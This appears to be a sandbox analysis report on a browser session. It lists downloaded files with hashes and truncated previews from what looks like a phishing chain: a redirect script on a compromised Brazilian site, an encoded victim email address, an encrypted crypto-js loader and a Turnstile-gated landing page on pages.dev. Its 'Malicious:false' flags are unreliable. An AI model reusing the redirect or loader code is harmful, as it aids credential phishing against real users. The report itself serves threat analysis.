                                                                Preview:L..................F.@.. ...$+.,.....g......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yf.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yh............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............rv......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:11:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2683
                                                                Entropy (8bit):3.998817685435195
                                                                Encrypted:false
                                                                SSDEEP:48:8ASdYTcAAHkidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:88vUT/TbxWOvTbxy7T
                                                                MD5:312D60792E3EE74C95A53EB775142458
                                                                SHA1:7DC5B889FEBAB3EA293D52316B3B19DC1CD5C4ED
                                                                SHA-256:C356B3F5AC38C499536EF5DD9E3EAFB885323243C932E9228669D93B33C6362D
                                                                SHA-512:16A0B8ED243443C5F978B6CF4A54097AC2E6EA8AAA3E4A76CCC090930DBE4E83F1FB4AD2B2CAD45BBDDE50E58FCDED7B7E62DFA79F9B639D06F660D3198BB9E6
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,....N.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yf.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yh............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............rv......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32793), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):33313
                                                                Entropy (8bit):5.6826482158255605
                                                                Encrypted:false
                                                                SSDEEP:768:0cza8GVvUfJBcfOFmtI/sal5Uoh6EXWXw6P:ZmvO72Xe/fl9hjWXw6P
                                                                MD5:EC7147B895FAD263D4E286B0FCCBFFFB
                                                                SHA1:61D9080E5F43FF69B89563877B09221005EB69D1
                                                                SHA-256:38C6BC920CB03D99E891E4034E5B2286FAB3A4EC39FBD9B1C7D83BC9865FCB04
                                                                SHA-512:DD2CB6BD4ACE933EA2D67A587068C4D88F98FDFCF7C03226A1037DD715A310D7078402173DE74EA3108E7BB704D0CDC1DB3892EEF98EF7FB5CE0F32845E13070
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber
                                                                Preview:var issue= document.createElement("script");..issue.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(issue);..issue.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiUVFZSUdzK0xVSHFvK2Y2WWViZnMxcXdteFJaQWVpV1dhTXcrS2JZdnR6aHdWeE9BSjZCYTBZb2RSSlVQWHBGSjBNNzJWaks0REl3M3AzcXlCRVdab1VEczVJQ2hkOVVab292c3BuNVwvXC9sd0cwZ3g0SDFRdk5QTkgyMjBtRUhBeVVXWlMrVStPYXpYXC9pKzRtRkRVMldMSGtUUHF5QWk4aENkTDdNajdHVnJQdHNZZjlmMUdVMmMrNllSUmRzOUZmYzNQMUpIN0pYN2RSQmFhQmE5XC9ZMkhLQnJPbjhPblRhY1pwVElpOEEyUEoybE5hRFVseTc3aU9aMEV2dmhrK2hOOFpnM3BNT05HekFMYlo4WUVKRXlGYkorcnFPblVMWll0QzVDYVZxQk5ZMnppNG9ncWhieko5bUI1clphUEJKRFlIYnYzVitEdThqaUJwY3ZXQjFEcDFMOXN1Z1wvWmN0eXUrZHdrM1VIOFhQZzh6OTFCR295Q21EQmtGUGt4SmxTMDNPQ2Q5U2JHTGZzZTYzbjZjUmdyeHk4Wm9Sc0pmZHNIdklxWlJHN2ZmbUY5MGxJV0x1UDR3Z3Z6MjdpVHR4bG1acHQ5YWZHZVROT1pQM3pqU3UzcXduZ2FRSSt0RUVYcnNyK1ZnUGpvZnpqeWNyanZ5eDM1TG50K0VzQk04V3B3U1ZxYWJaWWVvMUNSVWVMXC9pRmlvQTlTWFNZVGpOWUxKQUxQR2pPU0Y5UlRBT0l
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/favicon.ico
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                URL:https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (45034)
                                                                Category:downloaded
                                                                Size (bytes):45035
                                                                Entropy (8bit):5.400557193761079
                                                                Encrypted:false
                                                                SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                                MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                                SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                                SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                                SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js
                                                                Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (1350), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):2169
                                                                Entropy (8bit):5.424233332442579
                                                                Encrypted:false
                                                                SSDEEP:48:5r8mf/lgLghIJCmluFC3bEhFFNkTFjxBrFgGFCDVFWbF3XbOYN8888888jL9h/sJ:5vfNPKJCauA3bEn7inBraGADV0bJL/8e
                                                                MD5:0918D6444EFDE7EC5527522661AD10D0
                                                                SHA1:CEDBC26532CECF25E75F728358CF4353406206A6
                                                                SHA-256:E3369E682527DAC3914F3A6BA9D55340B9BBFF46478F85D8ADD4B6464D26E2BF
                                                                SHA-512:EB94DB56E21B4E56E27DC41654084A13BE46CBBCD4E0CF93A78F9BE4408F9D4C7706145F7B95FD8D97C600E6B5ABC18C6614830FBCB53872966784082D710154
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.primary {position: relative;width: 80px;height: 80px;}.primary div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite primary;transform-origin: 40px 40px;}.primary div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.primary div:first-child {animation-delay: -36ms;}.primary div:first-child:after {top: 63px;left: 63px;}.primary div:nth-child(2) {animation-delay: -72ms;}.primary div:nth-child(2):after {top: 68px;left: 56px;}.primary div:nth-child(3) {animation-delay: -108ms;}.primary div:nth-child(3):after {top: 71px;left: 48px;}.primary div:nth-child(4) {animation-dela
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):168
                                                                Entropy (8bit):5.040005807421441
                                                                Encrypted:false
                                                                SSDEEP:3:gn3QV9KGBkADFoHDX6zmgEDiTM4/L2ngHHHvHtQEpVEE7b:63GKGKmmH76CBDiTM2KgHvNXpCAb
                                                                MD5:448BDF6B7143F2C38BEE6637264E29D7
                                                                SHA1:71380B698C41AA150BC7F622D3F097DEF36B2752
                                                                SHA-256:97683705B2F6A3247A900CFDEC98788E17787B666095766C40617FA92C20711D
                                                                SHA-512:4AB2F71084E28073A4D9C4262E481D3CED0E4F2494CA3590D94678BEB5131341C3880401204D8CE0FB6CBB4148BC16C6F674FCB251C82A12085DAB1EC5618F4B
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Preview:<script>window.top.location.href = "https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=";</script>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):315
                                                                Entropy (8bit):5.0572271090563765
                                                                Encrypted:false
                                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/favicon.ico
                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                URL:"https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/,"
